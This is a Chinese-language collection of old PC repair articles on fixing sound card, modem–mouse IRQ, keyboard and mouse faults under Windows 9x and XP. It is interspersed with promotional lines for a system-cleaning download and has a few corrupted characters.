    如果您的声卡号称PnP，但Windows95就是不认怎么办？像以前很难安装的007声卡，解决方法很简单:假设安装前操作系统是DOS，先安装DOS下的声卡驱动程序，再进行Windows95下的安装。在安装过程中，当提示“本机即插即用设备”时选择“声卡”即可。实在不行的话，试着在autoexec.bat文件中添加一命令行“setblaster=a220i5d1h5t6”;若还不奏效，索性再重新安装Windows3.1，安装好win3.1下的驱动程序后再进行升级安装，这样Windows95多半会认出声卡。

    尽量使用新驱动程序或替代程序。还以联讯声卡为例，在Win95下用原驱动盘安装驱动程序怎么也装不上，只好用CreativeSB16驱动程序代替，才安装成功。升级到Windows97后又不正常，再换用Windows97自带的声卡驱动程序才正常。

    最头痛的问题莫过于Windows9x下检测到即插即用设备并自动安装驱动程序，而这个驱动程序却偏偏是不能用的，以后当你每次删掉重装都会出现这个问题，并且不能用“添加新硬件”的方法解决。此时应进入win9x\inf\other目录，把关于声卡的inf文件统统删掉，再重新启动后用人工安装。这一办法非常灵验。当然，修改注册表也能达到同样的目的。

    支持PnP声卡的安装（或不能用PnP方式安装的PnP声卡）。选择“控制面板”→“添加新硬件”，单击“下一步”，当提示“需要Windows搜索新硬件吗？”时，选择“否”，而后从列表中选择“声音、视频和游戏控制器”，直接选择声卡类型或用驱动程序磁盘进行安装。

    故障现象二:声卡无声
    原因及排除:系统默认声音输出为“静音”。单击屏幕右下角的声音小图标（小喇叭），出现音量调节滑块，下方有“静音”选项，单击前边的复选框，清除框内的对号，即可正常发音。

    声卡与其他插卡有冲突。解决办法是调整PnP卡所使用的系统资源，使各卡互不干扰。有时，打开“设备管理器”，虽然未见黄色的惊叹号（冲突标志），但声卡就是不发声，其实也是存在冲突，只是系统没有检测出来而已。

    安装了DirectX后声卡不能发声，说明此声卡与DirectX兼容性不好，须要更新驱动程序。

    一个声道无声。检查声卡到音箱的音频线是否有断线。

    故障现象三:声卡发出的噪音过大
    原因及排除:插卡不正。由于机箱制造精度不够高、声卡外挡板制造或安装不良导致声卡不能与主板扩展槽紧密结合，通过目视可见声卡上“金手指”与扩展槽簧片有错位。这种现象在ISA卡或PCI卡上都有，属于常见故障，一般用钳子就可解决问题。

    有源音箱输入接在声卡的Speaker输出端。有源音箱应接在声卡的Lineout端，它输出的信号没有经过声卡上的功放，噪声要小得多。有的声卡只有一个输出端，是Lineout还是Speaker要靠卡上的跳线决定，默认方式常常是Speaker，所以如果需要的话，还得拔下声卡调整跳线。

    Windows9x自带的驱动程序不良好。安装声卡驱动程序时，要选择“厂家提供的驱动程序”而不要选“Windows默认的驱动程序”。如果用“添加新硬件”方式安装，要选择“从磁盘安装”而不从列表框中选择。如果已经安装了Windows自带的驱动程序，可选“控制面板”→“系统”→“设备管理器”→“声音、视频和游戏控制器”，点中各分设备，选“属性”→“驱动程序”→“更改驱动程序”→“从磁盘安装”。这时插入声卡附带的磁盘或光盘，安装厂家提供的驱动程序。

    故障现象四:播放CD无声
    原因及排除:完全无声。用Windows95的“CD播放器”放CD无声，但“CD播放器”又工作正常。这时使用一条4芯音频线连接CD-ROM的模拟音频输出和声卡上的CD-in即可，此线在购买CD-ROM驱动器时会随同提供。
只有一个声道出声。光驱输出口一般为左右两线信号，中间两线为地线。由于音频信号线的4线颜色一般不同，可以从线的颜色上找到一一对应的接口。若声卡上只有一个接口或每一个接口与音频线都不匹配，通常只把其中2条线对换即可。

    故障现象五:无法正常录音
    原因及排除:首先检查插孔是否为“麦克风输入”。双击小喇叭，选择VolumeControl窗口的“选项”→“属性”命令，再单选“录音”项，看看各项设置是否正确。接下来选“控制面板”→“多媒体”→“设备”中调整“混合器设备”和“线路输入设备”，把它们设为“使用”状态。如果“多媒体”→“音频”中“录音”选项是灰色的那可就糟了，当然也不是没有挽救的余地，可以试试“添加新硬件”→“系统设备”中的添加“ISAPlugandPlaybus”。要是还不行的话，把Windows3.1下的驱动程序安装一遍，如果再不行，索性安装声卡的随卡工具软件后重新启动系统。

    故障现象六:无法播放wav、MIDI音乐或CD
   原因及排除:不能播放wav音乐常常是由于“多媒体”→“设备”下的“音频设备”不止一个，这时禁用一个即可;MIDI的问题是16位模式与32位模式不兼容的问题，通过安装软件波表的方式可以解决;CD无声肯定是因为与CD-ROM驱动器的连接线没有接好，接好后应该没有什么问题。

    故障现象七:PCI声卡出现爆音
    原因及排除:一般是由于PCI显卡采用了BusMaster技术，从而造成挂在PCI总线上的硬盘读写、鼠标移动等操作放大了背景噪音的缘故。解决方法是关掉PCI显卡的BusMaster功能（但显卡性能将大受影响），换成AGP显卡，将PCI声卡换插到PCI3或PCI4插槽上。


声卡维修经验集

《一键清理系统垃圾》

声卡维修经验集

1．检查声卡跳线是否正确。例如，一块联讯OPTI931声卡，有一说明书上没有的隐含跳线JP3，短路即为PnP，开路时Widows 95认不出声卡，但出厂时默认为开路！

    2．如果你的声卡号称PnP，但Windows 95就是不认怎么办？像以前很难安装的007声卡，解决方法很简单：假设安装前僮飨低呈荄OS，先安装DOS下的声卡驱动再进行Windows 95的安装，在安装中间提示“本机即插即用设备”时选择“声卡”即可。实在不行的话，在Autoexec.bat中添加一句“set blaster = a220 i5 d1 h5 t6”也行；这一招若还是不灵，索性再重新安装Windows 3.1，安装好Windows 3.1下的驱动程序后再进行升级安装，Windows 95多半就会认出声卡了。

    3．尽量使用新驱动程序或替代程序。还以联讯声卡为例，在Windows 95下用原驱动盘安装驱动程序怎么也装不上，只好用Creative SB16驱动程序代替，一切正常。后来升级到Windows 97，又不正常了再换用Windows 97（完整版）自带的声卡驱动程序才正常。Windows 98自带的驱动程序同样不行，只有Windows 97的驱动程序才能发挥作用，不是驱动程序越新越好。

    4．最头痛的问题莫过于Windows 9X下检测到即插即用设备却偏偏自作主张帮你安装驱动程序，这个驱动程序偏是不能用的，以后，每次当你删掉重装都会重复这个问题，并且不能用“添加新硬件”的方法解决。笔者在这里泄露一个独门密招：进入Win9xinfother目录，把关于声卡的＊.inf文件统统删掉再重新启动后用手动安装，这一着百分之百灵验，曾换救无数声卡性命……当然，修改注册表也能达到同样的目的。

    5．不支持PnP声卡的安装（也适用于不能用上述PnP方式安装的PnP声卡）：进入“控制面板”/“添加新硬件”/“下一步”，当提示“需要Windows搜索新硬件吗？”时，选择“否”，而后从列表中选取“声音、视频和游戏控制器”用驱动盘或直接选择声卡类型进行安装。

    声卡无声

    1．驱动程序默认输出为“静音”。单击屏幕右下角的声音小图标（小嗽叭），出现音量调节滑块，下方有“静音”选项，单击前边的复选框，清除框内的对号，即可正常发音。

    2．声卡与其它插卡有冲突。解决办法是调整PnP卡所使用的系统资源，使各卡互不干扰。有时，打开“设备管理”，虽然未见黄色的惊叹号（冲突标志），但声卡就是不发声，其实也是存在冲突，只是W ows 95没有检查出来。

    3．安装了Direct X后声卡不能发声了。说明此声卡与Direct X兼容性不好，需要更新驱动程序。

    4．一个声道无声。检查声卡到音箱的音频线是否有断线。

    声卡发出的噪音过大

    1．插卡不正。由于机箱制造精度不够高、声卡外挡板制造或安装不良导致声卡不能与主板扩展槽紧密结合，目视可见声卡上“金手指”与扩展槽簧片有错位。这种现象在ISA卡或PCI卡上都有，属于常见故障。一般可用钳子校正。

    2．有源音箱输入接在声卡的Speaker输出端。对于有源音箱，应接在声卡的Line out端，它输出的信号没有经过声卡上的功放，噪声要小得多。有的声卡上只有一个输出端，是Line out还是Speaker要靠卡上的跳线决定，厂家的默认方式常是Speaker，所以要拔下声卡调整跳线。

    3．Windows 95(98)自带的驱动程序不好。在安装声卡驱动程序时，要选择“厂家提供的驱动程序”而不要选“Windows默认的驱动程序”如果用“添加新硬件”的方式安装，要选择“从磁盘安装”而不要从列表框中选择。如果已经安装了Windows自带的驱动程序，可选“控制面板”/“系统”/“设备管理”/“声音、视频和游戏控制器”，点中各分设备，选“属性”/“驱动程序”/“更改驱动程序”/“从磁盘安装”。这时插入声卡附带的磁盘或光盘，装入厂家提供的驱动程序。

    播放CD无声

    1．完全无声。用Windows 95的“CD播放器”放CD无声，但“CD播放器”又工作正常，使用一条4芯音频线连接CD－ROM的模拟音频输出和声卡上的CD－in即可，此线在购买CD－ROM时会附带。

    2．只一个声道出声。光驱输出口一般左右两线信号，中间两线为地线。由于音频信号线的4条线颜色一般不同，可以从线的颜色上找到一一对应接口。若声卡上只有一个接口或每个接口与音频线都不匹配，只好改动音频线的接线顺序，通常只把其中2条线对换即可。

    无法正常录音

    首先检查插孔是否为“麦克风输入”，其次，双击小喇叭，选择选单上的“属性”/“录音”，看看各项设置是否正确。接下来在“控制面板”/“多媒体”/“设备”中调整“混合器设备”和“线路输入设备”，把它们设为“使用”状态。如果“多媒体”/“音频”中“录音”选项是灰色的那可就糟了，当然也不是没有挽救的余地，你可以试试“添加新硬件”/“系统设备”中的添加“ISA Plug and Play bus”，再不行的话，把Windows 3.1下的驱动安装一遍，如果还不行，索性把声卡随卡工具软件安装后重新启动。

    无法播放Wav音乐、Midi音乐或CD

    不能播放Wav音乐现象比较罕见，常常是由于“多媒体”/“设备”下的“音频设备”不只一个，禁用一个即可；Midi的问题是16位模式与32位模式不兼容的问题，通过安装软件波表的方式应该可以解决；CD无声肯定是因为与CD－ROM连接线没有接好，接好后就行了。

    PCI声卡出现爆音

    一般是因为PCI显卡采用Bus Master技术造成挂在PCI总线上的硬盘读写、鼠标移动等操作时放大了背景噪声的缘故。解决方法：关掉PCI显卡的Bus Master功能（但显卡性能将大大下降！）；换成AGP显卡；将PCI声卡换插槽上。

作者：


声卡与主板硬冲突

《一键清理系统垃圾》

声卡与主板硬冲突

《中国电脑教育报》蒋雪峰

    用电脑用了这么些年，声卡中断冲突之类的软故障解决不少，今天头一回碰到一例声卡与主板之间硬件级的冲突：

    那台老机主板芯片组为VT693+VT596，用Slot1接口的赛扬CPU，没有板载音效芯片，外接了一块FM801芯片PCI声卡。后来系统经常出现“中断冲突”的现象，而且一冲突系统就死机，鼠标、键盘都锁死，设置BIOS、调整中断死机照旧，进安全模式都不行，一定得把声卡卸下才行。几经折腾后系统干脆找不到声卡了，换到别的电脑上也检测不到，看来声卡是报销了。当时也没在意，心想可能是声卡质量太差，随便给它换了一块AD1815 ISA声卡，这次更邪乎了，在别的电脑上用得好好的声卡，一到这台机上就死活不能用了：键盘居然没有反应，连DOS也不能用，只在系统自检时能用它进BIOS，换用别的键盘情形还是照旧，而且要想正常使用也得把声卡卸下才行。后来不经意摸了一下声卡主芯片，温度居然和工作的CPU一样烫……看来某些主板与一些声卡有太深的“世仇”，骨子里面就水火不容，不是软件设置能解决的啊！不得已给它找了块CS4237 ISA声卡后系统终于正常了。


在集成型主板上安装新声卡

《一键清理系统垃圾》

返回总目录 上一页 目录页

在集成型主板上安装新声卡

    朋友一台微机，主板集成声卡但却没有声音输出插孔，加之这种声卡不是很好，因而朋友另外购买了一块声卡，请我帮忙安装上去。
        插上新声卡，开机后系统报告找到新硬件，插入驱动盘安装了驱动程序，但任务栏右下角却没有声音图标，声音文件也不能播放。打开“系统属性对话框”，在“设备管理器”中发现新安装的声卡中有好几项前面有“！”标志，查看原主板集成的声卡，已被放在“其它设备”中了，前面都有“？”标志，估计是两种声卡发生冲突。于是一一选中“其它设备”中带有“？”的几项设备，在“属性”对话框中将“在此硬件配置文件中禁用”一项选中。重新启动Win98，进入后仍不能正常发声，再次打开“系统属性对话框”，发现在“声音、视频和游戏控制器”中仍有一项前面有警告标志，“其它设备”中已有三项前面加上禁用标志“×”，但有一项却没有。查看属性，“在此硬件配置文件中禁用”一项已被选中，怎么回事？已经禁用为什么还会有冲突。试着将“声音、视频和游戏控制器”中带有警告标志的一项（即新声卡中的第一项）删除，然后单击“刷新”，结果系统找到新硬件并自动安装了驱动程序，前面的警告标志也没有了，任务栏右边的声音图标出现，播放声音文件也能正常发声了。
        本以为万事大吉，重新启动计算机，正准备离开，却发现启动时应该播放的声音没有发出。回头再次查看任务栏，右边没有显示声音图标。打开“系统属性”对话框，发现“声音、视频和游戏控制器”中这一项前面仍然有警告标志。看来需要手动调整设备冲突了，打开“系统属性”对话框，一一选中“其它设备”中带“？”的几项，在其属性对话框中单击“资源”标签，将“使用自动设置”前的选取标志“√”去掉，调整设备的“输入/输出范围”、“中断请求”和“直接内存访问”地址，使之没有冲突。重新启动后声音仍不能正常播放，但只要将“声音、视频和游戏控制器”中带有警告标志的这一项删除后再重新安装，系统就又能正常播放音乐。但这美妙的音乐在重新启动后就会消失。再次打开“系统属性”对话框，选中“声音、视频和游戏控制器”中带警告标志的这一项，查看其属性，系统却报告设备使用正常，没有资源冲突，真是奇怪了！再仔细观察发现其中“使用自动的设置”一项已被选中，考虑到系统自动设置时可能会造成与原主板集成声卡冲突，于是将“使用自动的设置”前的“√”去掉，再次重新启动，结果声音图标出现，动听的音乐也随之飘扬。将计算机电源关闭后，再次重新启动，一切正常，至此，问题终于得到解决。
        由此可知，主板集成了声卡的计算机再添加声卡时，必须通过手动设置解决资源冲突问题，由于资源有限，一定要将集成的声卡屏蔽掉，且新的声卡中不能使用系统的自动设置。


声卡故障

《一键清理系统垃圾》

返回总目录

声卡故障

◎SOUNDMAN导致无法录音
◎常见声卡故障问答集锦（二）
◎常见声卡故障问答集锦（一）
◎电脑声音失真故障的处理
◎集成声卡常见故障及解决
◎集成声卡故障处理大全(二)
◎集成声卡故障处理大全(三)
◎集成声卡故障处理大全(一)
◎默认设置惹的祸——排除声卡故障
◎浅析声卡
◎声卡
◎声卡故障排除几例
◎声卡维修经验集
◎声卡与主板硬冲突
◎在Linux下安装声卡
◎在集成型主板上安装新声卡

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


MODEM和鼠标冲突解决一例

《一键清理系统垃圾》

返回总目录 目录页 下一页

MODEM和鼠标冲突解决一例

    我原有一只TP－LINK（使用Cirrus芯片）的33.6Kbps的内置猫和一只PS/2的鼠标，后来鼠标坏了，我就到电脑城买了一个串口的新鼠标，可是意想不到的事情发生了……
    鼠标买回来后，把它接到我的技嘉HX主板上的COM1口上（HX芯片，集成S3V64＋显卡，COM2的位置被VGA端口占用了，因此只留下一个COM1端口），开机进入Win98，识别为“Standard Serial mouse”型鼠标，用起来也很顺手。第二天我准备上网，在MODEM拨号连接的时候，鼠标突然间失灵了!不管我怎样摇怎样按全都无济于事，随后我用键盘强行把连接关闭了，鼠标又突然“活”了过来!这也太奇怪了！再连接！小鼠又“死”了。重新启动！鼠标还是不能使用！重装Win98和小猫的驱动程序！唉！刚一拨号小鼠就死了。
    这种情况从表面上一看就是MODEM与鼠标有软件或硬件上的冲突，可是重装Win98都解决不了问题。MODEM与鼠标的硬件质量问题肯定是排除在外了，因为它们只在拨号连接时才产生冲突。那会不会是MODEM的驱动程序有Bug呢？我打开了MODEM的驱动程序看了看，发布的日期竟然是1997年11月份，肯定兼容性不佳。于是我又向朋友借了一只PS/2的鼠标，上网寻找新的驱动程序，最后在Cirrus自己的网站上下载了1999年5月23日发布的最新驱动程序。可是装上后拨号上网鼠标还是无法使用！这可叫我怎么办啊！这时我忽然想起原来好像看过一篇关于主板BIOS设置不当造成的COM口的数码相机无法使用的文章，讲的好像就是我的这种整合性主板的COM口使用问题，但我却忘了是在哪份杂志上了。只好自己到主板的BIOS中查找，可是由于主板太老了，根本找不到关于IRQ的选项。
    于是又回到Win98，在启动桌面的时候，我突然在右下角的工具栏中见到了一个以前从未有过的图标！打开一看，原来是新加入的一个检测内置猫的工作状态的程序，其中一项“comport”是用来选择猫的工作端口的，共有四个选项，是“COM1、COM3、COM2和COM4”，根据默认设置，猫的接口是在“COM3”上。对!那篇文章好像就是讲的主板虽然给了COM1和COM3两个不同的I/O地址，但是它们的IRQ都是相同的!换句话说，就是COM1/COM3、COM2/COM4这两对串口都是由相同的中断（IRQ）来控制两个不同的I/O地址，因此在COM1和COM3（或COM2和COM4）上接的设备同时工作时就会出现IRQ地址上的冲突，从而导致其中的一个设备无法正常使用。我恍然大悟！原来内置猫在使用时占去了鼠标的IRQ！那鼠标不“死”才怪哩！我赶紧把小猫的工作端口改到COM4，使猫和鼠标使用不同的IRQ地址，然后重新启动，再拨号上网，故障终于消失了，鼠标和猫在网上配合得很默契，猫再也不“咬”小鼠了。


XP系统CS鼠标加速问题解决办法！！！

《一键清理系统垃圾》

XP系统CS鼠标加速问题解决办法！！！

一、在桌面CS的快捷方式上加参数“ -noforcemaccel -noforcemparms -noforcemspeed”

如：D:\反恐精英中文站CS1.5中文硬盘版\CS1.5中文硬盘版\cstrike.exe -noforcemaccel -noforcemparms -noforcemspeed

二、把控制面板里的鼠标属性中的“提高指针精确度”前面的勾去掉

三、去下载winxp_mouse_acceleration_fix.zip 这是去掉XP系统中鼠标加速的注册表补丁

另外：xp下玩游戏fps值通常都被锁定在60FPS

你可以去下载NvCoolFX 锁定刷新率

再把cs目录里的config.cfg打开

把其中默认的fps_max 70 改成 fps_max 你锁定的刷新率（比如fps_max 100）

再关闭显卡属性中的垂直同步

这样之后在xp下玩cs和98 下应该没什么感觉不同

哦 xp下的senz一般是98下的一倍

比如你在98下鼠标灵敏度是1.25

那么在xp下可能要到2.50

当然 刚开始用xp玩cs很不习惯

经过上面的设置以后

再经过一定时间的调试

你会发现xp玩cs其实也很不错

我用了2个星期适应 ： ）

在以前的网吧我把20多台电脑改成WIN XP，新来一个网管（计算机文盲）只会玩泡泡跟CS，连装个系统都不会，在老板眼里自称为CS高手说XP根本不能玩CS，害的我被老板一直说，做什么XP系统，晕死了！！所以把这个贴转给大家！！我自己试了，XP玩CS真的不错~~这个是转贴，xp_mouse_fix.rar这个是从网盟里面c945124 那里下的~~如果你网吧配置好的话做XP系统挺不错的！

详细请使用压缩文件


常见键盘故障分析

《一键清理系统垃圾》

常见键盘故障分析

   键盘是电脑必备的输入设备，使用频率很高。使用时间一长，键盘难免要出现这样那样的故障。笔者在教学工作中总结了一些键盘的故障，希望能给大家提供一些帮助。
   故障种类一：接口问题
   故障现象：1、开机时提示“Keyboard error or no keyboard present”；2、开机后Windows 98启动到蓝天白云时死机。
   引起第一种故障的原因有：键盘没有接好；键盘接口的插针弯曲；键盘或主板接口损坏。
   处理：在开机时注意键盘右上角的三个灯是否闪烁一下，如果没有闪烁，首先检查键盘的连接情况；接着观察接口有无损坏，用万用表测量主板上的键盘接口，如果接口中的第1、2、5芯中某一芯的电压相对于4芯为0伏，说明接口线路有断点，找到断点重新焊接好即可。如果主板上的键盘接口正常，则说明键盘损坏，更换新的键盘。
   引起第二种故障的原因大部分是键盘和鼠标接反，将其正确安装即可。

   故障种类二：键盘内部线路故障
   故障现象：录入文字时按一个键同时出现两到三个字母，或某一排键无法输出
   处理：键盘内部的线路有短路，可以拆开键盘对键盘内部进行清理，这样就可以解决（平时要注意清理键盘，将键盘反转过来轻轻拍打即可）；对于一排键无法输出的现象，那是因为键盘中有断路，拆开键盘，找到断路点焊接好即可。

   故障种类三：按键不能弹起（多见于Enter、Shift、Ctrl、Alt）
   故障现象：1、键盘指示灯闪烁一下后，显示器黑屏；2、单击鼠标选中多个目标；3、录入文字时大写灯灭，但是输入的字母全是大写。
   处理：一般只要将卡住的键恢复原位即可。但是这些键可能弹簧出了问题，下次还会卡住。最好将键帽取下来，简单处理一下，如更换弹簧等。
   出现这类故障的主要原因是键盘质量太差。大家在装机时对键盘的重视不够或是图便宜，从而购买了劣质键盘。其实大家使用键盘、鼠标的频率是很高的，从经济角度来讲到不如使用结实耐用的好键盘，而且现在的普通好键盘才五六十元，而其使用时间是劣质键盘的两三倍以上。


错接鼠标键盘的故障

《一键清理系统垃圾》

错接鼠标键盘的故障

   从1999年我有了自己的爱机到现在已经四年多了，对计算机的认识不说精通，也算是略知一二了。但最近遇到的问题，真是有点丈二和尚——摸不着头脑。
   事情是这样的，今年元旦后我把自己的爱机升级了，将换下的VIA 694X芯片组杂牌主板和Celeron 733MHz卖了280元了事。新装上的美达815EB主板和Tualatin 1.3GHz CPU感觉确实快了很多。在商家柜台装机时，玩游戏、运行软件等等一切都很顺畅，没有出现任何问题。可回到了家问题就接踵而至——电脑不能重新启动，一重启就会默认地进入安全模式。强行进入正常模式查看硬件管理，无任何惊叹号，使用也无异常。爱机怎么了，难道是水土不服？不会是新买的内存和老电脑用的内存不兼容吧？想到这儿，我以最快的速度拔下旧内存，再开机，问题还是没有解决。到这个地步，我也无计可施了。因为夜色已深、又很劳累，我决定明早先重装系统再说。
   一觉醒来，突然想起自己的那些软件在朋友处，他家又很远，怎么办？再看看硬件吧，我又把机箱内所有的插卡和接线重做了一遍。当我重插键盘和鼠标时，突然看到由于昨晚光线较暗，鼠标和键盘的接口插反了，一切的问题原来就在这儿，真是气死我了！我这只朋友眼中的老鸟怎么也犯了如此低级的错误？插好键盘和鼠标，开机一切正常，又可以接着踢我的FIFA了。
   此事让我惭愧了许久，在这里我也想提醒各位老鸟、菜鸟一声，硬件的安装马虎不得，一定要细心检查，毕竟这和电视机还有不少的区别哪！


机械式键盘常见故障处理多例

《一键清理系统垃圾》

机械式键盘常见故障处理多例

    键盘是计算机系统最常见、最常用的输入设备，而且使用频率很高，时间一长，机械式键盘难免要出现一些故障，现介绍两则机械式键盘常见故障的分析与维修，供大家参考。
    故障现象一：开机时，显示“Key Board Error”字样。
    故障分析与处理：1．首先检查键盘接口是否有问题。因为它检查起来最方便，不必拆键盘。先将键盘线从机箱上拔下来，然后重新插回，再开机看故障是否消失，这样可排除由于键盘接口接触不良造成的故障。
    2．如果仍有问题，可使用万用表测量机箱上的键盘接口，如果开机时测量到第1、2、5芯的某个电压相对于第4芯为0V，说明连接线断了，找到断点重新接好就行了。
    3．如果机箱上的接口没问题，那就得拆开键盘了。注意一下开机时键盘右上角的NumLock、CapsLock、ScrollLock三个灯应该同时闪烁一下，如果不闪，则很可能是键盘线与键盘之间的接头出了问题，看看接头是否松动，是，则将其插紧后再开机，如正常则故障排除。否则用万用表测量一下接头各脚电压是否正常，如果机箱上接头的电压正常而此处不正常，则说明键盘线中间有断线，只有换一根线了。
    故障现象二：键按下后不能弹起。
    故障分析与处理：键按下不能弹起的问题常发生在回车键和空格键上，因为这两个键使用频率最高，也就使得这两个键下面的弹簧弹力减弱最快，引起弹簧变形，致使该键与触点不能及时分离，最后导致按键无法弹起。可以用手指捏紧键帽或使用平口改锥将键帽拔出，这样就可取出座子盖片下的弹簧，接下来，更换新的弹簧或将原弹簧整型恢复，重新安装好后故障排除。
    如果新买的键盘也出现这种问题，可能是因为键盘加工粗糙，键体、键帽注塑质量很差，有许多毛刺未清理或清理不彻底，使键体与键帽相对位置发生变化，按键后不能弹回。应仔细检查一下是否因键帽边缘有毛刺而阻碍了回弹，是则先用小刀把毛刺刮掉，再用细砂布将其打磨平滑。否则，那只能说你买的键盘质量不过关了。
    故障现象三：键按下能正常弹回，但按键后屏幕上没有对应的字符显示。
    此时如果其它键均正常，就说明键盘电路没问题，那故障原因可能有两处。一是该键在电路板上的触点表面有污物，造成接触片与触点之间接触不良，而使按键失灵。二是键体中一个很薄的弹簧片张力不足或变形，同样导致接触不良。如果问题是第一个原因引起的，先用毛刷将污物刷去，然后再用无水酒精将接触表面擦洗干净就行了。但如果是第二个原因，就要麻烦些了。打开键盘后盖，将键盘中的电路板取出，找出故障键的焊点后用电烙铁将其焊下。此时如果有新的键体，就直接进行更换，但单独的键体一般并不好买。所以如果是一常用键出问题，而又等着用键盘，可以先将一不常用的键的键体换上使用，如ScrollLock键。如果要对键体进行维修，则需小心打开键体，用镊子轻轻取出里面的薄弹簧片，用无水酒精清洗干净，加上少许润滑油，恢复其弹力后再放回，以上几步需要仔细进行。确认修好后将键体重新装好封上，再装回键盘，用电烙铁焊好，重新装好，故障排除。
    故障现象四：按下一键后，其左右相邻键的字符也显示出来。
    该故障很可能是由于电路板局部线路短路造成的。打开键盘后盖，发现故障键周围的弹簧片已将电路板表面的绝缘漆磨掉而直接与线路接触，于是造成某一局部多处短路。将电路板用无水酒精擦干净，然后用粘性较强的绝缘胶布将磨损处贴上，使弹簧片底部不能直接接触线路。重新装好，故障排除。
    故障现象五：相邻的几个键不能按下。
    相邻的几个键同时损坏和被污物污染的可能性很小。该故障很可能是由于电路板局部线路断裂造成的。打开键盘后盖，用万用表检查，发现电路板上的印刷线确实有一个非常细的裂纹，于是造成某一局部断路，使得相邻的几个键不能正常键入。用电烙铁将其焊好。重新装好，故障排除。
    故障现象六：按下一个键后，连续出现多个相同字符。
    该故障很可能是由于电路板局部线路短路造成的。打开键盘后盖，发现键盘电路板的触点处有少量金属粉末，这是因为键在频繁地敲击后，磨损电路板形成少量金属粉末，造成电路板短路，从而形成上述现象。可以用无水酒精把这些金属粉末擦洗干净。重新装好，故障排除。
    另外也有可能是细小的金属导体异物掉入键盘内，使触点短路。打开键盘后盖，仔细清除触点处的导电异物。


机械鼠标指针游走故障的分析

《一键清理系统垃圾》

机械鼠标指针游走故障的分析

    鼠标为电脑的常备外设。没有鼠标，大多数软件也可以通过键盘操作，但显得异常笨拙。现今常见鼠标以机械鼠标和光电鼠标为主，绝大多数为机械鼠标。
机械鼠标是通过移动鼠标，带动胶球滚动，胶球的滚动又磨擦鼠标内的分管水平和垂直两个方向的栅轮滚轴，驱动栅轮转动。栅轮轮沿为格栅状。紧靠栅轮格栅两侧，一侧是一红外发光管，另一侧是红外接收组件。红外接收组件为一三端器件，其中包含甲乙两个红外接收管。在水平和垂直栅轮夹角正对方向有一压紧轮，它使胶球无论向何方向滚动都始终压紧在两个栅轮轴上。

    鼠标通过 ps/2 口或串口与主机相连。接口中一般使用四根线，分别是电源 , 地，时钟和数据。

    机械鼠标正常工作时，鼠标的移动转换为水平和垂直栅轮不同方向和转速的转动。栅轮转动时，栅轮的轮齿周期性遮挡红外发光管发出的红外线照射到接收组件中的甲管和乙管 , 从而甲和乙输出端输出电脉冲至鼠标内控制芯片。由于红外接收组件中甲乙两管垂直排列，栅轮轮齿夹在红外发射与接收中间的部分的移动方向为上下方向，而甲乙接收管与红外发射管的夹角不为零，于是甲乙管输出的电脉冲有一个相位差。鼠标内控制芯片通过此脉冲相位差判知水平或垂直栅轮的转动方向，通过此脉冲的频率判知栅轮的转动速度，并不断通过数据线向主机传送鼠标移动信息，主机通过处理使屏幕上的光标同鼠标同步移动。

    在现在的windows系统中，电脑启动时，通过接口初始化鼠标。如果鼠标电缆中有一根断，主机会给出鼠标未安装，请你关机安装鼠标的信息。如果在使用中拔下鼠标接头或鼠标电缆接触不良，则鼠标系统瘫死。

    知道了鼠标的基本工作原理，下面我们共同探讨一下鼠标指针自动游走的原因。

    指针游走故障的现象：偶尔鼠标不动，而屏幕上鼠标指针水平或垂直方向匀速但速度较快的移动。

    经过杀毒及重装系统软件，经过调换鼠标，证明系统及主机正常。此时鼠标指针游走的原因如下：指针移动说明鼠标通过串行数据线给主机送去了鼠标移动信息，但此时鼠标又未动，鼠标芯片怎么会发出移动数据呢？其原因是鼠标中红外发射管与栅轮轮齿及红外接收组件三者之间的相对位置不当，再加上主机通过接口送出的电源电压与鼠标匹配不好。试想，当某一时刻鼠标中某一栅轮恰好停于使接收组件中甲乙两管产生相同电压的位置，而此电压恰巧又是鼠标芯片识别亮暗信号的判定阀值电压，即此电压有可能被鼠标芯片识别为亮，也有可能识别为暗。若此时鼠标芯片对甲管输出识别为亮信号， 乙管输出为暗信号，鼠标依此对信号进行处理，而芯片的处理必引起接收组件中甲乙接收管的输出电压及鼠标芯片对亮暗判别阀值的微小的变化。因为鼠标芯片也是时钟驱动的数字电路，它对信号的识别也有时钟周期，当下一识别周期到来时，则判别结果会是甲为暗乙为亮。至此，鼠标芯片两个识别周期的识别结果不同，于是芯片得出了栅轮转动的信息。此过程循环，则指针向一方向快速匀速移动直至屏幕边沿。

    此故障的关键点是主机输送给鼠标的电源电压使鼠标中某一红外发射管发射的红外光在感光组件中甲乙两感光管产生的光信号电压正好处于鼠标芯片判别亮暗信号的识别分界阀值点上。此点非常巧合，所以鼠标指针游动的出现也极随机，有时可能几天不出现，而有时又频繁发生。出现此故障一般仅发生在一个方向上。因为该故障与主机接口输出的电源也有关系，故可能会在一台机器上出现故障的鼠标在另一机器上工作正常。

    另一鼠标故障 ---- 移动鼠标时，鼠标指针轻微抖动，不能和鼠标很好同步 ---- 与鼠标游走的原因相同。

    解决方法：
    1、更换鼠标及牌号。
    2、调整故障对应方向红外发射管、红外接收组件与栅轮的相对位置。


键盘

《一键清理系统垃圾》

键盘

[color=Green]键盘在使用过程中，故障的表现形式是多种多样的，原因也是多方面的。有接触不良故障，有按键本身的机械故障，还有逻辑电路故障、虚焊、假焊、脱焊和金属孔氧化等故障．维修时要根据不同的故障现象进行分析判断，找出产生故障原因，进行相应的修理。[/color]
[color=Red]常见故障一：键盘上一些键，如空格键、回车键不起作用，有时，需按无数次才输入—个或两个字符，有的
键，如光标键按下后不再起来，屏幕上光标连续移动，此时键盘其它字符不能输入，需再按一次才能弹起
来。[/color]
